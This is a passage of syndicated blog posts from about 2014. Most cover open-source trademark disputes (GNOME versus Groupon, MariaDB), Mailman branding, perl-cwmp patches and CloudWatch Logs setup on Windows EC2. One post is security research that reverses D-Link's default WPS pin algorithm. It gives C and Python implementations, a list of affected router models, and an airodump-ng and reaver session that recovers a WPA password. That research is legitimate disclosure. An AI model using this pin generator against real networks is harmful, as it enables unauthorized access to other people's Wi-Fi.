Groupon Tried To Take GNOME’s Name & Failed

Post Syndicated from Bradley M. Kuhn original http://ebb.org/bkuhn/blog/2014/11/11/groupon.html

[ I’m writing this last update to this post, which I posted at 15:55
US/Eastern on 2014-11-11, above the original post (and its other update),
since the first text below is the most important message about this
situation. (Please note that I am merely a mundane GF member, and I don’t
speak for GF in any way.) ]

There is a lesson to be learned here, now that Groupon has (only after public
admonishment from the GNOME Foundation) decided to do what the GNOME Foundation
asked of them from the start. Specifically, I’d like to point out how
it’s all too common for for-profit companies to treat non-profit charities
quite badly, even when the non-profit charity is involved in an
endeavor that the for-profit company nominally “supports”.

The GNOME Foundation (GF) Board minutes are public; you can go and read
them. If you do, you’ll find that for many months, GF has been spending
substantial time and resources to deal with this issue. They’ve begged
Groupon to be reasonable, and Groupon refused. Then, GF (having at least a
few politically savvy folks on their Board of Directors) decided they had
to make the (correct) political next move and go public.

As a professional “Free Software politician”, I can tell you
from personal experience that going public with a private dispute is always
a gamble. It can backfire, and thus is almost always a “last
hope” before the only other option: litigation. But, Groupon’s
aggressive stance and deceitful behavior seem to have left GF with little
choice; I’d have done the same in GF’s situation. Fortunately, the gamble
paid off, and Groupon caved when they realized that GF would win —
both in the court of public opinion and in a real court later.

However, this tells us something about the ethos of Groupon as a company:
they are willing to waste the resources of a tiny non-profit charity (which
is currently run exclusively by volunteers) simply because Groupon thought
they could beat that charity down by outspending them. And, it’s not as if
it’s a charity with a mission Groupon opposes — it’s a charity
operating in a space which Groupon claims to love.

I suppose I’m reacting so strongly to this because this is exactly the
kind of manipulative behavior I see every day from GPL violators. The
situations are quite analogous: a non-profit charity, standing up for a
legal right of a group of volunteer Free Software developers, is viewed by
that company as a bug it can squash with its shoe. The company only gives
up when it realizes the bug won’t die, and it will just have to give up
this time and let the bug live.

GF, frankly and fortunately, got off a little lightly. For my part, the
companies (and their cronies) that oppose copyleft have called me
a “copyright troll”, claimed I am “guilty of
criminal copyright abuse”, and also accused me of enforcing the
GPL merely to “get rich” (even though my salary has been public
since 1999 and is less than all of theirs). Based on my experience with
GPL enforcement, I can assure you: Groupon had exactly two ways to go
politically: either give up almost immediately once the dispute was public
(which they did), or start attacking GF with dirty politics.

Having personally often faced the aforementioned “next political
step” by the for-profit company in similar situations, I’m thankful
that GF dodged that, and we now know that Groupon is unlikely to make dirty
political attacks against GF as their next move. However, please don’t
misread this situation: Groupon didn’t “do something nice just
because GF asked them to”, as the Groupon press people are no doubt
at this moment feeding the tech press for tomorrow’s news cycle. The real
story is: “Groupon stonewalled, wasting limited resources of a small
non-profit for months, and gave up only when the non-profit politically
outflanked them”.

My original post and update from earlier in the day on 2014-11-11 follow
below as they originally appeared:

It’s probably been at least a decade, possibly more, since I saw
a proprietary software company
attempt to take the name of an existing Free Software project. I’m
very glad GNOME Foundation had the forethought to register their trademark,
and I’m glad they’re defending it.

It’s important to note that names are really different from copyrights.
I’ve been a regular critic of the patent and copyright systems,
particularly as applied to software. However, trademark law, while it
has some serious flaws, has at its root a useful principle: people looking
for stuff they really want shouldn’t be confused by what they find. (I
remember as a kid the first time I got a knock-off toy and I was quite
frustrated and upset for being duped.) Trademark law is designed primarily
to prevent the public from being duped.

Trademark is also designed to prevent a new actor in the marketplace from
gaining advantage using the good name of an existing work. Of course,
that’s what Groupon is doing here, but Groupon’s position seems to have
come from the sleaziest of their attorneys, and it’s completely
disingenuous: “Oh, we never heard of GNOME and we didn’t even search the
trademark database before filing. Meanwhile, now that you’ve contacted us,
we’re going to file a bunch more trademarks with your name in them.”
BTW, the odds that they are lying about never searching the USPTO database
for GNOME are close to 100%. I have been involved with registration of
many a trademark for a Free Software project: the first thing you do is
search the trademark database. The USPTO even provides a public search
engine for it!

Finally, GNOME’s legal battle is not merely their own. Proprietary
software companies always think they can bully Free Software projects.
They figure Free Software just doesn’t matter that much and doesn’t have
the resources to fight. Of course, one major flaw in the trademark system
is that it is expensive (because of the substantial time
investment needed by trademark experts) to fight an attack like this.
Therefore, please donate to the GNOME
Foundation
to help them in this fight. This is part of a proxy war
against all proprietary software companies that think they can walk all
over a Free Software project. Thus, this issue relates to many others in
our community. We have to show the wealthy companies that Free Software
projects with limited resources are not pushovers, but non-profit charities
like GNOME Foundation cannot do this without your help.

Update on 2014-11-11 at 12:23 US/Eastern:
Groupon responded to the GNOME Foundation publicly on their
“engineering” site. I wrote the following comment on
that page and posted it, but of course they refused to allow me to post
a comment [0], so I’ve posted my
comment here:

If you respected software freedom and the GNOME project, then you’d have
already stopped trying to use their good name (which was trademarked before
your company was even founded) to market proprietary software. You say
you’d be glad to look for another name; I suspect that was GNOME
Foundation’s first request to you, wasn’t it? Are you saying the
GNOME Foundation has never asked you to change the name of the product
you’ve been calling GNOME?

Meanwhile, your comments about “open source” are suspect at
best. Most technology companies these days have little choice but to
interact in some ways with open source. I see, of course, that Groupon has
released a few tidbits of code, but your website is primarily proprietary
software. (I notice, for example, that a visit just to your welcome page at
groupon.com attempts to install a huge amount of proprietary Javascript on my
machine — luckily I use NoScript to reject it.) Therefore, your argument
that you “love open source” is quite dubious. Someone who loves
open source doesn’t just liberate a few tidbits of their code; they embrace
it fully. To be accurate, you probably should have said: “We like open
source a little bit.”

Finally, your statement, which is certainly well-drafted Orwellian
marketing-speak, doesn’t actually answer
any of the points the GNOME Foundation raised with you. According to the
GNOME Foundation, you were certainly communicating, but in the meantime you
were dubiously registering more infringing trademarks with the USPTO. The
only reasonable conclusion is that you used the communication to buy time to
stab GNOME Foundation in the back further. I do a lot of work
defending copyleft communities against
companies that try to exploit and mistreat those communities, and yours are
the exact types of manipulative tactics I often see in those
negotiations.

[0] While it’s
of course standard procedure for websites to refuse comments, I
find it additionally disingenuous when a website looks like it
accepts comments, but then refuses some. Obviously, I don’t think
trolls should be given a free pass to submit comments, but I
rather like the solution of simple full disclosure: Groupon
should disclose that they are screening some comments.
This, BTW, is why I just use a third party application (pump.io)
for my comments. Anyone can post. 🙂

Branding GNU Mailman Headers & Footers

Post Syndicated from Bradley M. Kuhn original http://ebb.org/bkuhn/blog/2014/11/08/mailman.html

As always, when something takes me a while to figure out, I try to post
the generally useful technical information on my blog. For the
new copyleft.org site, I’ve been trying
to get all the pages branded properly with the header/footer. This was
straightforward for ikiwiki (which hosts the main site), but I spent an
hour searching around this morning for how to brand the GNU Mailman
instance
on lists.copyleft.org.

Ultimately, here’s what I had to do to get
everything branded, and I’m still not completely sure I found every spot.
It seems that someone who wanted to make a useful patch to GNU Mailman
could offer up a change that unifies the HTML templating and branding. In
the meantime, at least for GNU Mailman 2.1.15 as found in Debian 7
(wheezy), here’s what you have to do:

First, some of the branding details are handled in the Python code itself,
so my first action was:

# cd /var/lib/mailman/Mailman
# cp -pa htmlformat.py /etc/mailman
# ln -sf /etc/mailman/htmlformat.py htmlformat.py

I did this because htmlformat.py is not a file that the Debian
package installation of Mailman puts in /etc/mailman, and I wanted
to keep track, with etckeeper, of the fact that I was
modifying that file.

The primary modifications that I made to that file were in the
MailmanLogo() method, to which I added a custom footer, and
in the Document.Format() method, to which I added a custom
header (at least when not self.suppress_head).
The suppress_head thing was a red flag that told me it was
likely not enough merely to change these methods to get a custom header
and footer on every page. I was right. Ultimately, I also had to change
nearly all the HTML files in /etc/mailman/en/, each of which
needed different changes based on what file it was, and there was no
clear guideline. I suppose I could have
added <MM-Mailman-Footer> to every file that had
a </BODY> but didn’t yet have that tag, to get my footer
everywhere, but in the end I custom-hacked the whole thing.
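
For illustration, here is a minimal, self-contained sketch of the pattern I
applied inside htmlformat.py. This is not Mailman’s actual code: the class
and method names only mimic its shape, and the branding markup is
hypothetical.

SITE_HEADER = '<div class="site-header"><a href="https://copyleft.org/">copyleft.org</a></div>'
SITE_FOOTER = '<div class="site-footer">Hosted by copyleft.org</div>'

def MailmanLogo():
    # In the real htmlformat.py this returns the "Delivered by Mailman" links;
    # appending the site footer here brands every page that calls it.
    return '<p>Delivered by Mailman</p>' + SITE_FOOTER

class Document:
    suppress_head = False

    def Format(self, body=''):
        out = []
        if not self.suppress_head:
            # Pages that emit their own <head> set suppress_head, which is
            # why editing the templates in /etc/mailman/en/ is also needed.
            out.append('<html><head><title>Mailing lists</title></head><body>')
            out.append(SITE_HEADER)
        out.append(body)
        out.append(MailmanLogo())
        out.append('</body></html>')
        return '\n'.join(out)

print(Document().Format('<h1>lists.copyleft.org</h1>'))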

The full set of patches that I applied to all the Mailman files is
available on copyleft.org,
in case you want to see how I did it.

Reversing D-Link’s WPS Pin Algorithm

Post Syndicated from Craig original http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

While perusing the latest firmware for D-Link’s DIR-810L 802.11ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers:
Call to sub_4D56F8 from getWPSPinCode
I first began examining this particular piece of code with the hopes of controlling part of the format string that is passed to __system. However, this data proved not to be user controllable, as the value placed in the format string is the default WPS pin for the router.

The default WPS pin itself is retrieved via a call to sub_4D56F8. Since the WPS pin is typically programmed into NVRAM at the factory, one might expect sub_4D56F8 to simply be performing some NVRAM queries, but that is not the case:
The beginning of sub_4D56F8
This code isn’t retrieving a WPS pin at all, but instead is grabbing the router’s WAN MAC address. The MAC address is then split into its OUI and NIC components, and a tedious set of multiplications, xors, and shifts ensues (full disassembly listing here):
Break out the MAC and start munging the NIC
While the math being performed is not complicated, determining the original programmer’s intent is not necessarily straightforward due to the assembly generated by the compiler. Take the following instruction sequence for example:
li $v0, 0x38E38E39
multu $a3, $v0
mfhi $v0
srl $v0, 1

Directly converted into C, this reads:

v0 = ((a3 * 0x38E38E39) >> 32) >> 1;

Which is just a fancy way of dividing by 9:

v0 = a3 / 9;

Likewise, most multiplication and modulus operations are also performed by various sequences of shifts, additions, and subtractions. The multu assembly instruction is only used for the above example where the high 32 bits of a product are needed, and there is nary a divu in sight.
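
As a quick sanity check (a small Python sketch of my own, not code from the
firmware), the reciprocal-multiplication sequence really does behave as an
unsigned divide by 9:

# Verify the compiler's reciprocal-multiplication trick for 32-bit a3 / 9.
# 0x38E38E39 is the "magic" constant; the hardware keeps the high 32 bits
# of the product (mfhi), then shifts right by 1, for a total shift of 33.
for a3 in (0, 1, 8, 9, 10, 12345, 0x12345678, 0xFFFFFFFF):
    v0 = ((a3 * 0x38E38E39) >> 32) >> 1
    assert v0 == a3 // 9, (a3, v0)
print("reciprocal multiplication matches integer division by 9")
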
However, after translating the entire sub_4D56F8 disassembly listing into a more palatable format, it’s obvious that this code is using a simple algorithm to generate the default WPS pin entirely from the NIC portion of the device’s WAN MAC address:

unsigned int generate_default_pin(char *buf)
{
char *mac;
char mac_address[32] = { 0 };
unsigned int oui, nic, pin;

/* Get a pointer to the WAN MAC address */
mac = lockAndGetInfo_log()->wan_mac_address;

/*
* Create a local, NULL-terminated copy of the WAN MAC (simplified from
* the original code’s sprintf/memmove loop).
*/
sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
mac[1],
mac[2],
mac[3],
mac[4],
mac[5],
mac[6],
mac[7],
mac[8],
mac[9],
mac[10],
mac[11]);

/*
* Convert the OUI and NIC portions of the MAC address to integer values.
* OUI is unused, just need the NIC.
*/
sscanf(mac_address, "%06X%06X", &oui, &nic);

/* Do some XOR munging of the NIC. */
pin = (nic ^ 0x55AA55);
pin = pin ^ (((pin & 0x0F) << 4) +
((pin & 0x0F) << 8) +
((pin & 0x0F) << 12) +
((pin & 0x0F) << 16) +
((pin & 0x0F) << 20));

/*
* The largest possible remainder for any value divided by 10,000,000
* is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
*/
pin = pin % 10000000;

/* The pin needs to be at least 7 digits long */
if(pin < 1000000)
{
/*
* The largest possible remainder for any value divided by 9 is
* 8; hence this adds at most 9,000,000 to the pin value, and at
* least 1,000,000. This guarantees that the pin will be 7 digits
* long, and also means that it won’t start with a 0.
*/
pin += ((pin % 9) * 1000000) + 1000000;
}

/*
* The final 8 digit pin is the 7 digit value just computed, plus a
* checksum digit. Note that in the disassembly, the wps_pin_checksum
* function is inlined (it’s just the standard WPS checksum implementation).
*/
pin = ((pin * 10) + wps_pin_checksum(pin));

sprintf(buf, "%08d", pin);
return pin;
}
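
For reference, here is a compact Python translation of the same algorithm,
including the standard WPS checksum that the disassembly inlines. This is my
own re-implementation, not code from the firmware; it reproduces the 99767389
pin shown in the capture below.

def wps_pin_checksum(pin):
    # Standard WPS pin checksum digit (same algorithm used by wpa_supplicant/Reaver).
    accum = 0
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10

def generate_default_pin(wan_mac):
    # wan_mac is a colon-separated MAC string; only the NIC (low 24 bits) matters.
    nic = int(wan_mac.replace(":", ""), 16) & 0xFFFFFF
    pin = nic ^ 0x55AA55
    pin ^= (((pin & 0x0F) << 4) + ((pin & 0x0F) << 8) +
            ((pin & 0x0F) << 12) + ((pin & 0x0F) << 16) +
            ((pin & 0x0F) << 20))
    pin %= 10000000
    if pin < 1000000:
        pin += ((pin % 9) * 1000000) + 1000000
    return "%07d%d" % (pin, wps_pin_checksum(pin))

# On the DIR-810L the WAN MAC is the BSSID + 1:
print(generate_default_pin("C0:A0:BB:EF:B3:D7"))   # -> 99767389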

Since the BSSID is only off-by-one from the WAN MAC, we can easily calculate any DIR-810L’s WPS pin just from a passive packet capture:

$ sudo airodump-ng mon0 -c 4

CH 4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C0:A0:BB:EF:B3:D6 -13 0 6 0 0 4 54e WPA2 CCMP PSK dlink-B3D6

$ ./pingen C0:A0:BB:EF:B3:D7 # <— WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: ‘99767389’
[+] WPA PSK: ‘hluig79268’
[+] AP SSID: ‘dlink-B3D6’

But the DIR-810L isn’t the only device to use this algorithm. In fact, it appears to have been in use for some time, dating all the way back to 2007 when WPS was first introduced. The following is an – I’m sure – incomplete list of affected and unaffected devices:
Confirmed Affected:

DIR-810L
DIR-826L
DIR-632
DHP-1320
DIR-835
DIR-615 revs: B2, C1, E1, E3
DIR-657
DIR-827
DIR-857
DIR-451
DIR-655 revs: A3, A4, B1
DIR-825 revs: A1, B1
DIR-651
DIR-855
DIR-628
DGL-4500
DIR-601 revs: A1, B1
DIR-836L
DIR-808L
DIR-636L
DAP-1350
DAP-1555

Confirmed Unaffected:

DIR-815
DIR-505L
DIR-300
DIR-850L
DIR-412
DIR-600
DIR-685
DIR-817LW
DIR-818LW
DIR-803
DIR-845L
DIR-816L
DIR-860L
DIR-645
DIR-685
DAP-1522

Some affected devices, like the DIR-810L, generate the WPS pin from the WAN MAC; most generate it from the BSSID. A stand-alone tool implementing this algorithm can be found here, and has already been rolled into the latest Reaver Pro.

On Russia, Without Love

Post Syndicated from Longanlon original http://kaka-cuuka.com/3428


Russophilia and Russophobia are traditional hobbies in our country, and not a day goes by without me running into a heated internet argument on the subject. Russia really does bear the imprint of its difficult past while trying to get by in the modern world, and it is a bit silly to label it the source of all evil, which is why some time ago I wrote about it with love. Given the sentiments of many Bulgarians, however, I think it is time for a few words about Russia without any love at all…

(Read more…) (843 words)


OpenFest 2014

Post Syndicated from Йовко Ламбрев original https://blog.yovko.net/openfest-2014/

It feels like it was yesterday… but in fact, when I first stood in front of an OpenFest audience, the most significant digit of the variable that holds my age was a two, and now it is already a four. I know I could have put that more plainly 🙂
This Saturday and Sunday the next OpenFest will take place, and each time its programme is more ambitious, mature and interesting. This year’s in particular impresses me a great deal.
And the best part: by now probably the third consecutive generation of twenty-year-olds is making sure that OpenFest keeps happening!

MariaDB foundation trademark agreement

Post Syndicated from Michael "Monty" Widenius original http://monty-says.blogspot.com/2014/10/mariadb-foundation-trademark-agreement.html

We have now published the trademark agreement between the MariaDB Corporation (formerly SkySQL) and the MariaDB Foundation. This agreement guarantees that the MariaDB Foundation has the rights needed to protect the MariaDB server project!

With this protection, I mean to ensure that the MariaDB Foundation in turn ensures that anyone can be part of MariaDB development on equal terms (like with any other open source project).

I have received some emails and read some blog posts from people who are confusing trademarks with the rights and possibilities for community developers to be part of an open source project. The MariaDB Foundation was never created to protect the MariaDB trademark. It was created to ensure that what happened to MySQL would never happen to MariaDB: that people from the community could not be part of driving and developing MySQL on equal terms with other companies.

I have personally never seen a conflict with having one company own the trademark of an open source product, as long as anyone can participate in the development of the product! Having a strong driver for an open source project usually ensures that there are more full-time developers working on a project than would otherwise be possible. This makes the product better and makes it useful for more people. In most cases, people are participating in an open source project because they are using it, not because they directly make money on the project.

This is certainly the case with MySQL and MariaDB, but also with other projects. If the MySQL or the MariaDB trademark had been fully owned by a foundation from the start, I think that neither project would have been as successful as they are! More about this later.

Some examples of open source projects that have the trademark used or owned by a commercial parent company are WordPress (wordpress.com and WordPress.org) and Mozilla. Even when it comes to projects like Linux that are developed by many companies, the trademark is not owned by the Linux Foundation.

There has been some concern that MariaDB Corporation has more developers and Maria captains (people with write access to the MariaDB repositories) on the MariaDB project than anyone else. This means that the MariaDB Corporation has more say about the MariaDB roadmap than anyone else. This is right and actually how things should be; the biggest contributors to a project are usually the ones that drive the project forward. This doesn’t, however, mean that no one else can join the development of the MariaDB project and be part of driving the roadmap. The MariaDB Foundation was created exactly to guarantee this.

It’s the MariaDB Foundation that governs the rules of how the project is developed, under what criteria one can become a Maria captain, the rights of the Maria captains, and how conflicts in the project are resolved. Those rules are not yet fully defined, as we have had very few conflicts when it comes to accepting patches. The work on these rules has been initiated and I hope that we’ll have nice and equal rules in place soon. In all cases the rules will be what you would expect from an open source project.

Any company that wants to ensure that MariaDB will continue to be a free project and wants to be part of defining the rules of the project can join the MariaDB Foundation and be part of this process!

Some of the things that I think went wrong with MySQL and would not have happened if we had created a foundation similar to the MariaDB Foundation for MySQL early on:

Claims that companies like Google and Ebay can’t get their patches into MySQL if they don’t pay (this was before MySQL was bought by Sun).
Closed source components in MySQL, developed by the company that owns the trademark to MySQL (almost happened to MySQL in Sun and has happened in MySQL Enterprise from Oracle).
Not giving the community access to the roadmap.
Not giving community developers write access to the official repositories of MySQL.
Hiding code and critical test cases from the community.
No guarantee that a patch will ever be reviewed.

The MariaDB Foundation guarantees that the above things will never happen to MariaDB. In addition, the MariaDB Foundation employs people to perform reviews, provide documentation, and work actively to incorporate external contributions into the MariaDB project.

This doesn’t mean that anyone can push anything into MariaDB. Any changes need to follow project guidelines and need to be reviewed and approved by at least one Maria captain. Also, no Maria captain can object to the inclusion of a given patch except on technical merits. If things can’t be resolved among the captains and/or the user community, the MariaDB Foundation has the final word.

I claimed earlier that MariaDB would never have been successful if the trademark had been fully owned by a foundation. The reason I can claim this is that we tried to do it this way and it failed! If we had continued on this route, MariaDB would probably be a dead project today!

To understand this, you will need a little background in MariaDB history. The main points are:

Some parts of the MariaDB team and I left Sun in February 2009 to work on the Maria storage engine (now renamed to Aria).
Oracle started to acquire Sun in April 2009.
Monty Program Ab then hired the rest of the MariaDB engineers and started to focus on MariaDB.
I was part of founding SkySQL in July 2010, as a home for MySQL support, consultants, trainers, and sales people.
The MariaDB Foundation was announced in November 2012.
Monty Program Ab and SkySQL Ab joined forces in April 2013.
SkySQL Ab renamed itself to MariaDB Corporation in October 2014.

During the 4 years before the MariaDB Foundation was formed, I had contacted most of the big companies that used MySQL to thank them for their success and to ask them to be part of MariaDB development. The answers were almost all the same: “We are very interested in you succeeding, but we can’t help you with money or resources until we are using MariaDB ourselves. This is only going to happen when you have proved that MariaDB will take over from MySQL.”

It didn’t help that most of the companies that used to pay for MySQL support had gotten scared of MySQL being sold to Oracle and had purchased 2-4 year support contracts to protect themselves against sudden price increases in MySQL support.

In May 2012, after 4 years and spending close to 4 million Euros of my own money to make MariaDB possible, I realized that something would have to change. I contacted some of the big technology companies in Silicon Valley and asked if they would be interested in being part of creating a MariaDB Foundation, where they could play bigger roles.

The idea was that all the MariaDB developers from Monty Program Ab, the MariaDB trademark and other resources would move to the foundation. For this to happen, I needed guarantees that the foundation would have resources to pay salaries to the MariaDB developers for at least the next 5 years. In the end two companies showed interest in doing this, but after months of discussions they both said that “now was not yet the right time to do this”.

In the end I created the MariaDB Foundation with a smaller role, just to protect the MariaDB server, and got some great companies to support our work:

Booking.com
SkySQL (2 years!)
Parallels (2 years!)
Automattic
Zenimax

There were also some smaller donations from a variety of companies. See the whole list at https://mariadb.org/en/supporters.

During this time, SkySQL had become the biggest supporter of MariaDB and also the biggest customer of Monty Program Ab. SkySQL provided front-line support for MySQL and MariaDB, and Monty Program Ab did the “level 3” support (bug fixes and enhancements for MariaDB).

In the end there were only two ways to go forward to secure the financing of the MariaDB project:

a) Get investors for Monty Program Ab
b) Sell Monty Program Ab

Note that neither of the above options would have been possible if Monty Program Ab had not owned the MariaDB trademark!

Selling to SkySQL was in the end the right and logical thing to do:

They have good investors who are committed to SkySQL and MariaDB.
Most of the people in the two companies already know each other, as most come from the old MySQL team.
The MariaDB trademark was much better known than SkySQL, and owning it would make it much easier for SkySQL to expand their business.
As SkySQL was the biggest supporter of the MariaDB project, this felt like the right thing to do.

However, to ensure the future of the MariaDB project, SkySQL and Monty Program Ab both agreed that the MariaDB Foundation was critically needed and that we had to put a formal trademark agreement in place. Until now there was just a verbal promise of the MariaDB trademarks to the foundation, and we had to do this legally right. This took, for a lot of reasons too boring to bring up here, much longer than expected. You can find the trademark agreement publicly available here. However, now this is finally done and I am happy to say that the future of MariaDB, as an open source project, is protected and there will never again be a reason for me to fork it!

So feel free to join the MariaDB project, either as a developer or community contributor or as a member of the MariaDB Foundation!

My perl-cwmp patches are merged

Post Syndicated from Delian Delchev original http://deliantech.blogspot.com/2014/10/my-perl-cwmp-patches-are-merged.html

Hello,

I’ve used perl-cwmp here and there. It is a nice, really small, really light and simple TR-069 ACS, with a very easy install and no heavy requirements. You can read the whole code in a few minutes and make your own modifications. I am using it in a lot of small “special” cases, where you need something fast and specific, or a very complex workflow that cannot be implemented by any other ACS server.

However, this project has been stalled for a while. I’ve found that a lot of modern TR-069/CWMP agents do not work well with perl-cwmp. There are quite a few reasons behind those problems:

- Some of the agents are very strict: they expect the SOAP message to be formatted in a specific way, not the way perl-cwmp does it.
- Some of the agents are compiled with a not-so-smart, static expansion of the CWMP XSD file. That means they expect a strict type specification in the SOAP message and strict ordering.

perl-cwmp does not “compile” the CWMP XSD and does not send strict requests, nor does it interpret the responses strictly. It does not automatically set the correct property type in the request according to the spec, because it never reads the spec. It always assumes that the property type is a string.

To allow perl-cwmp to be fixed and adjusted to work with those types of TR-069 agents, I’ve made a few modifications to the code, and I am happy to announce they have been accepted and merged into the main code:

The first modification is that I’ve updated (according to the current standard) the SOAP header. It was incorrectly set, and many TR-069 devices I have tested (basically all that work with the Broadcom TR-069 client) rejected the request.

The second modification is that all the properties may now have a specified type. Unless you specify the type, it is always assumed to be a string. That allows the ACS to set property values on agents that do a strict type check:

InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#60

The #…# specifies the type of the property. In the example above, we are setting an unsignedInt value of 60 for PeriodicInformInterval.

You can also set the value of a property by reading the value of another property. For that you can use ${ property name }. Here is an example of how to set the PPP password to the value of the serial number:

InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password: ${InternetGatewayDevice.DeviceInfo.SerialNumber}

And last but not least: you can now execute a small piece of code, or an external script, and set the value of a property to the output of that code. You can do that with $[ code ]. Here is an example of how to set a random value for the PeriodicInformInterval:

InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#$[60 + int(rand(100))]

Here is another example, executing an external script that could take this decision:

InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#$[ `./externalscript.sh ${InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.1.MACAddress} ${InternetGatewayDevice.DeviceInfo.SerialNumber}` ]

The last modification I’ve made is to allow perl-cwmp to “fork” a new process when a TR-069 request arrives. The code has been single-threaded, which means the agents had to wait until the previous task was completed. However, if the TCP listening queue is full, or the ACS is very busy, some of the agents will assume there is no response and time out. You may then have to wait up to 24 hours (the default periodic inform interval for some vendors) until you get your next request. Now that can be avoided.

All this is very valuable for dynamic and automated configurations, without the need to modify the core code, just the configuration file.

Using CloudWatch Logs with Amazon EC2 Running Microsoft Windows Server

Post Syndicated from Mats Lanner original http://blogs.aws.amazon.com/application-management/post/Tx1KG4IKXZ94QFK/Using-CloudWatch-Logs-with-Amazon-EC2-Running-Microsoft-Windows-Server

Now Amazon EC2 running Microsoft Windows Server provides enhanced log support for Amazon CloudWatch Logs. You can monitor the operations and performance of your EC2 for Windows instances and applications in near real-time using standard log and performance data sources including:

Event Tracing for Windows log sources

IIS request logs

Performance Counters

Text-based log files

Windows Event Logs

EC2 Windows integrates with CloudWatch Logs using a plug-in for the EC2Config service that is installed on all new EC2 Windows instances by default. To follow along with the example in this post, you will need to download the latest version of the EC2Config service software from http://aws.amazon.com/developertools/5562082477397515.

For this blog post, I’m using a SQL Server 2014 instance just so that uploading of SQL Server logs can be demonstrated.

Permissions

While the CloudWatch plug-in for EC2Config supports explicit credentials, it’s strongly recommended to use IAM Roles for EC2 which makes it possible to associate specific permissions with an EC2 instance when it’s launched.

A sample policy that allows the necessary CloudWatch and CloudWatch Logs actions (to learn more about adding a policy to an existing IAM role, see IAM Users and Groups and Managing IAM Policies in Using IAM) looks like this:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1414002531000",
"Effect": "Allow",
"Action": [
"cloudwatch:PutMetricData"
],
"Resource": [
"*"
]
},
{
"Sid": "Stmt1414002720000",
"Effect": "Allow",
"Action": [
"logs:CreateLogGroup",
"logs:CreateLogStream",
"logs:DescribeLogGroups",
"logs:DescribeLogStreams",
"logs:PutLogEvents"
],
"Resource": [
"*"
]
}
]
}

CloudWatch Plug-In Configuration

Detailed information on how to configure CloudWatch can be found here: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#send_logs_to_cwl. In this blog post I will focus on a few specific examples around Event Tracing for Windows (ETW) and SQL Server error logs.

Enable the Plug-In

The CloudWatch plug-in for EC2Config is disabled by default, so the first step that needs to be taken is to enable it. The easiest way to do this is to run EC2ConfigService Settings on the instance where you want to enable the plug-in:

Enabling CloudWatch support

Check the Enable CloudWatch Logs integration checkbox and click the OK button to save the changes. Note that the EC2Config service must be restarted for this to take effect, but we can hold off on doing that in this case as we will first configure the log sources that should be uploaded to CloudWatch Logs and the Performance Counters that should be uploaded to CloudWatch. For information on how to programmatically enable the integration, see the documentation: http://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/UsingConfig_WinAMI.html#enable_cwl_integration

Configuration

The CloudWatch plug-in is configured using the file %PROGRAMFILES%\Amazon\Ec2ConfigService\Settings\AWS.EC2.Windows.CloudWatch.json. This file contains the settings for CloudWatch, CloudWatch Logs, the log sources and performance counters that should be uploaded. For the purposes of this post I’m going to use the default settings for CloudWatch which means that data will be uploaded to us-east-1 using the CloudWatch namespace Windows/Default. I will, however, customize the configuration for CloudWatch Logs to demonstrate how different log sources can be uploaded to different log groups and log streams.

CloudWatch Logs

For this example I will use two log groups and log streams for the different types of log data that will be configured later, so replace the default CloudWatch Logs configuration:

{
  "Id": "CloudWatchLogs",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "Default-Log-Group",
    "LogStream": "{instance_id}"
  }
},

With:

{
  "Id": "CloudWatchLogsSystem",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "System-Logs",
    "LogStream": "{instance_id}"
  }
},
{
  "Id": "CloudWatchLogsSQL",
  "FullName": "AWS.EC2.Windows.CloudWatch.CloudWatchLogsOutput,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "AccessKey": "",
    "SecretKey": "",
    "Region": "us-east-1",
    "LogGroup": "SQL-Logs",
    "LogStream": "{instance_id}"
  }
},

This configuration creates two CloudWatch Logs components, one that will upload log data to the log group System-Logs (which will be used for Event Logs and ETW) and one that will upload log data to the log group SQL-Logs (which will be used to upload SQL Server log files).

Log Sources

The default configuration file contains sample configurations for all supported log sources. For this post I will define a new ETW log source to capture group policy processing and a custom log file source to capture SQL Server error log files.

Event Tracing for Windows

The default configuration file contains a sample ETW log source with the id ETW, modify this log source to look like this:

{
  "Id": "ETW",
  "FullName": "AWS.EC2.Windows.CloudWatch.EventLog.EventLogInputComponent,AWS.EC2.Windows.CloudWatch",
  "Parameters": {
    "LogName": "Microsoft-Windows-GroupPolicy/Operational",
    "Levels": "7"
  }
},

This change tells the plug-in to upload all log entries from the ETW source that shows up as Applications and Services Logs | Microsoft | Windows | GroupPolicy | Operational in the Windows Event Viewer.

Custom Log Files

The custom log file support can handle almost any text-based log file. To configure upload of SQL Server error logs, change the sample CustomLogs log source to look like this:

{
  "Id": "CustomLogs",
